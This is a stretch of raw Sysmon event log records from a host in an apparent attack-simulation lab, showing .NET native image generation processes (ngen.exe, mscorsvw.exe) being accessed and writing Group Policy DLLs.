13:45:57.594{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-8001-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.594{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-8001-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:57.578{59A5CD1D-9115-6005-7F01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1290-0\Microsoft.GroupPolicy.Management.Interop.dll2021-01-18 13:45:57.578 10341000x80000000000000005766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.438{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-7F01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.422{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-7F01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.422{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-7F01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.359{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-7E01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.344{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-7E01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.344{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-7E01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:57.328{59A5CD1D-9115-6005-7D01-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\374-0\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll2021-01-18 13:45:57.328 10341000x80000000000000005759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.250{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-7D01-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.250{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-7D01-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.250{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-7D01-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.203{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-7C01-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.188{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-7C01-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.188{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-7C01-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:57.125{59A5CD1D-9114-6005-7B01-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c24-0\Microsoft.GroupPolicy.Targeting.dll2021-01-18 13:45:57.125 10341000x80000000000000005812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8C01-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.875{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8C01-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.875{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8C01-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.844{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8B01-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.828{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8B01-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.828{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8B01-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:58.828{59A5CD1D-9116-6005-8A01-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\be8-0\Microsoft.GroupPolicy.Commands.dll2021-01-18 13:45:58.828 10341000x80000000000000005805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.625{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8A01-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.625{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8A01-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.625{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8A01-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:58.609{59A5CD1D-9116-6005-8901-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10a8-0\Microsoft.GroupPolicy.Commands.dll2021-01-18 13:45:58.609 10341000x80000000000000005801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.422{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8901-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\n